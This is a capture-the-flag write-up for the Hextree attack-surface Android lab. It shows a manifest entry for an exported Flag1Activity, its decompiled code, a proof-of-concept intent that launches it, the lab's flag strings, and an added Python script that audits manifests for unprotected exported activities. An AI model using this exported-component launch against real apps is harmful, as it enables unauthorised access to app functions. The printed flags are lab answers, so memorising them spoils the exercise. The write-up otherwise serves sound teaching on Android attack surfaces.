Static Analysis
Upon inspecting Flag1Activity in the AndroidManifest.xml file, we see the following:

    <activity
        android:name="io.hextree.attacksurface.activities.Flag1Activity"
        android:exported="true"/>

Since exported is set to true, we can call this activity from our exploit APK. Let's review the code to see how we can get the flag:

    public class Flag1Activity extends AppCompactActivity {
        public Flag1Activity() {
            this.name = "Flag 1 - Basic exported activity";
            this.flag = "zABitOReWutKdkrMKx2NPVXklOmLz1SB85u2kJjUe1ojI9LMWkbEKkjANz15WHmb";
        }

        @Override
        protected void onCreate(Bundle bundle) {
            super.onCreate(bundle);
            this.f = new LogHelper(this);
            this.f.addTag("basic-main-activity-avd2");
            // No check on the caller or on the incoming intent: starting the activity is enough.
            success(this);
        }
    }

So we only need to call this activity and we will get the flag.
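The manual manifest check above, generalized into an added example (not part of the original write-up): a Python audit that lists every activity other apps can start, including ones exported implicitly through an intent-filter, and flags those with no android:permission. Only Flag1Activity comes from the page; the other manifest entries and the function names are constructed for illustration, and the input is assumed to be a decoded (text) manifest such as apktool or jadx produces.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Constructed sample: only Flag1Activity is from the page; the other entries are hypothetical.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="io.hextree.attacksurface">
  <application>
    <activity android:name="io.hextree.attacksurface.activities.Flag1Activity"
        android:exported="true"/>
    <activity android:name=".InternalActivity" android:exported="false"/>
    <activity android:name=".GuardedActivity" android:exported="true"
        android:permission="com.example.permission.INTERNAL"/>
    <activity android:name=".LegacyActivity">
      <intent-filter>
        <action android:name="com.example.action.VIEW_ITEM"/>
      </intent-filter>
    </activity>
  </application>
</manifest>
"""

def exported_activities(manifest_xml):
    """Return (name, reason, permission) for every activity other apps can start."""
    root = ET.fromstring(manifest_xml)
    app = root.find("application")
    app_perm = app.get(ANDROID_NS + "permission")  # app-wide default permission
    findings = []
    for tag in ("activity", "activity-alias"):
        for node in app.iter(tag):
            exported = node.get(ANDROID_NS + "exported")
            has_filter = node.find("intent-filter") is not None
            if exported == "true":
                reason = "explicit"
            elif exported is None and has_filter:
                reason = "implicit (intent-filter)"  # default before Android 12
            else:
                continue
            perm = node.get(ANDROID_NS + "permission") or app_perm
            findings.append((node.get(ANDROID_NS + "name"), reason, perm))
    return findings

def unprotected(findings):
    """Exported activities with no permission requirement: review these first."""
    return [name for name, _, perm in findings if perm is None]

if __name__ == "__main__":
    for name, reason, perm in exported_activities(SAMPLE_MANIFEST):
        print(f"{name:60} exported={reason:25} permission={perm}")
```

An activity that appears in the `unprotected` list needs either `android:exported="false"`, a permission requirement, or its own validation of the caller and intent before doing sensitive work.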
Creating POC
In our APK we create a button that, when clicked, fires an intent to Flag1Activity:

    // Inside the exploit app's Activity, after the layout has been set
    Button button = findViewById(R.id.button_flag1);
    button.setOnClickListener(new View.OnClickListener() {
        @Override
        public void onClick(View v) {
            Log.v("HEXTREE", "Going to flag 1 activity");
            // Explicit intent: name the target package and activity class directly
            Intent intent = new Intent();
            intent.setComponent(
                new ComponentName("io.hextree.attacksurface", "io.hextree.attacksurface.activities.Flag1Activity"));
            startActivity(intent);
        }
    });

Flag
HXT{basic-exported-activity-1bh7sd}